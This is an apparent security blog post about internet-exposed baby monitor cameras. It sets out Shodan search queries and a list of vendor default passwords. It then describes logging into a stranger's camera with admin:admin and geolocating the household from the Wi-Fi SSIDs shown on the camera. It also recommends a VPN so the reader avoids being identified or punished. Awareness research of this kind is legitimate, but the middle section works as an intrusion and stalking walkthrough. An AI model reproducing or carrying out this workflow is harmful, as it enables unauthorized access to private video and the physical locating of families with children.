Baby monitors expose not only video stream but also geolocation of your home
The Cooltechzone research team discovered several vulnerabilities at the end of September 2021. They affect especially IP cameras used as baby monitors while revealing the owner's physical address and providing extensive information about the environment.
Most of the found vulnerabilities are associated with misconfigurations or a lack of cyber hygiene, but some could affect the whole home or small company network, giving potentially access to any other connected to that network devices.
Over 460,000 children go missing each year. Around 5,000 of those missing children are kidnapped (FBI).
Assuming that many parents leave their kids under the surveillance of baby monitors alone at home, we decided to share this research with you as fast as possible to save you and your families from undesirable consequences.
Table of Contents
Disclaimer: Any data presented in this publication should not be used for any illegal actions against another person's physical and digital privacy. Copying, using, and distributing article materials without attribution is prohibited by copyright law.
We have prepared the following diagram to show the numbers at a glance
We have used the relatively simple method of searching for exposed baby monitors with the assistance of shodan.io.
As usually started with a comprehensive overview of the global situation and then getting closer to the target of our interest, we got results as mentioned
- The first step was made within search query for all devices using the RTSP (Real-time streaming protocol) on the Internet at the time of research, namely "port:554". We found more than 4,5+ million devices, so there is a choice for everybody.
- The next step was already more towards the category of targeted devices. After asking Shodan about 'rtsp "200"', he showed us 1,6+ million devices available for watching their stream.
Usually, this means also watching the video stream without authentication!
Look at the left side. It is clear that 195,000+ devices are casting their streams from within the US. That is what going to be more interesting.
- We use further dorks to query the Shodan search engine, and if everything is done right (but believe me, it is fatherly hard to do it wrong), we see the following screen.
There we see precisely what we were looking for. And that is all on the first page with results!
Clicking around the output, I've mentioned relation about 1 baby monitor to every 5 images – so rough 20% of all output. And that is where the approximation of 40,000 baby monitors comes into play.
While one may tell that he has no secret from anybody, even if it relates to his real-time video stream from the bedroom, another group of people really cares about such fact… unfortunately, still not serious enough.
There are thousands of ways how to find out following data. Still, we are showing you how unsophisticated kidnappers can use publicly available services to discover a potential victim. Of course, this also applies to anybody with mental health disabilities or an average snooper.
- Don't be surprised! We can even identify the city based on the ISP information, but it is not that precise yet. I will come back to it later. The Shodan actually provides a lot of valuable information for good purposes, but unfortunately for destructive purposes.
- You say “Coincidence!”, we say: “Take more!”
This time we got even two kids.
So, now we will look at something quite special.
And when I say special, I don't mean rare or extraordinary – now it is actually a coincidence.
I was looking at data on the screen. I accidentally saw few interesting indicators, so I decided to give it a try. There are two important things on the following screenshot:
- there is port 80 open – which tells us about the webserver running on this device. I should admit that it is not available without authentication, but being there is already 50% of success for us;
- there is Basic authentication enabled with extraordinary realm value – this looks like a cheap camera without proper configuration. Believe me or not, this is what we will see most of the time as baby monitors.
Many of you have already turned your cameras off, but another part of readers want to know what comes next.
As you remember, in the last part of this research, we found a compelling case for further investigation, but already on the level of browser.
We are going to open the IP address on found device in any available browser – we don’t need any special equipment for this as well as anybody else.
From this moment on, we are going to another dimension of research, where we will communicate with the third-party system directly, without a medium as Shodan.
To protect yourself from being identified and punished, even if you made it not for malicious purposes, I strongly recommend you use paid VPN service, which will guarantee a no logs policy and good coverage of servers around the world.
You can use a comparison between ExpressVPN and NordVPN, which we have done for you, to decide on the best choice for you.
After opening discovered IP in the browser, it asks me about username and password, as expected, and is it as it should be. Many systems could be found online even without basic authentication implemented or enabled.
10 years ago as today, many used standard credentials that are very weak and easy to brute-force.
You will be surprised, but mainly used pair of credentials for any kind of security cameras, regardless of brand, are following:
Amcrest, American Dynamics, Avigilon, Dahua, GeoVision, Intellio, Sony, etc.
Panasonic, LTS, Swann, HIKVision, 3xLogic
Admin:1234, 11111111:11111111, root:root, service:service
More passwords could be found on the Internet and even not on hacker forums.
I was using the official website of the iSpy application for video surveillance. They have a dedicated page to topic default credentials on different cameras.
First things first, we are using a pair of "admin:admin" to ensure that this camera is protected.
Unfortunately, it is not, and we are in.
This welcome page doesn't reveal any data about the manufacturer and device model. It looks like my first website was written on HTML. Wait a minute, it is an HTML page, but anyway, let us click on the "PC view" link.
We will be transferred to a specific page for live broadcasting from the camera, built on Flash technology, which was prohibited because of security reasons already many years but most part of Internet browsers.
Of course, we can find Windows XP with Internet Browser 7 or 8 to make it work, but our topic is slightly different. We don't care about image and control from the camera. All this was visible even without access to the admin console.
We are looking for available settings over the web console. Sometimes, they can be drastically reduced over the Internet and are primarily available through LAN connection.
But it is not the case here. Look at this excellent info! Here is the most interesting Device Type code – so we can quickly check and identify the HIPCAM device. The second interesting fact, the camera is connected to Wi-Fi.
We will look at Network settings to check if there is information about the Wi-Fi network.
Now we know the SSID of the active network, but also 10+ SSID of neighborhood wireless networks. It is enough for us to identify the location of the broadcasting device.
We are going to use the website wigle.net for searching around SSID’s ever broadcasting for the last 10 years.
You see the output with many SSID, which have exactly the same name. But since we have no information about the nearest wireless networks, we can narrow down the search area.
After spending some time sorting and matching output, we were at the place.
We can even walk around thanks to Google.
As you might have seen, we got very far by only looking at the beginning query 'rtsp "200"'.
I regret to say it is not yet all, but I will not go practically with further attacks here and am going to present all further threats in theory.
As it was mentioned before, such attacks create high risks of kidnapping.
Children sexual slavery is a crucial problem for many developed countries. While video surveillance may help you better control your children at home, your baby camera can become a weapon of your enemy without proper configuration and maintenance.
The protection of children is only one aspect. The second one is about protecting your assets within the perimeter of your network.
Usually, there are not so many opportunities to remote attacks from the Internet involving high-risk CVSS scored vulnerabilities. But they exist, and considering the number of devices only, we can only assume how the potentially wide attack surface is possible.
Take one example, just a week ago, a researcher of Watchfull_IP reported Remote Code Execution (RCE) vulnerability for HIKVISION products, which was listed as CVE-2021-36260 and scored 9,8 out of 10 for criticality factors.
This class of vulnerabilities makes it possible to control a breached device and send execution commands on it as you would sit in from your computer, connected to the same LAN network.
There are many potential vectors for further attacks like man-it-the-middle with all possible suboptions, reconnaissance, network discovery, etc.
And all these without any kind of physical access from the malicious actor.
Looking again in Shodan, we will find almost 5 million HIKVISION devices online globally, but also 750,000 of them only within the US.
You can see here that Shodan was even able to identify vulnerabilities automatically. Suppose we are speaking about vulnerability from 2013 here. How many people do you think updated firmware on their devices right after the release of the fixed firmware?
Or even better to ask, how many of them know about the vulnerability and solution?
The protection of baby monitors or other IP cameras can be easy and challenging at the same time. We will give you some basic recommendations to help you reduce risks to at least appropriate levels.
1. Check and update the firmware of your device immediately!
This principle will help you to avoid being a victim in a long perspective. The firmware update by many modern devices happened automatically without actions from the user, which is good and bad at the same time but will be a topic for another research.
2. Configure and update administrator passwords periodically on your device.
Many users fear making changes to devices, even at home. While it can create some inconveniences, remembering a long password or using secure password storage creates excellent protection from snoopers and opportunistic attackers.
3. Enable all security functions if you don't want to understand everything.
This is exactly an example for more is better. If your device supports specific security functions, but you don't know how to use them properly, enable them all and check if you are satisfied with the functionality. If yes – just live those functions enabled.
It is unnecessary to say that presented information is still only a peak of the iceberg for private data breaches.
Every day we are facing all old issues concerning our privacy, which involving complex chains of highly professional manipulations against technology and people to reach malicious goals of the perpetrator, but sometimes forgetting even change a default password on an Internet-connected device, thus, giving access to our lives, families, secrets to random people.
We are already working on an even much more severe issue, which we are going to present soon!
Stay tuned and watch around!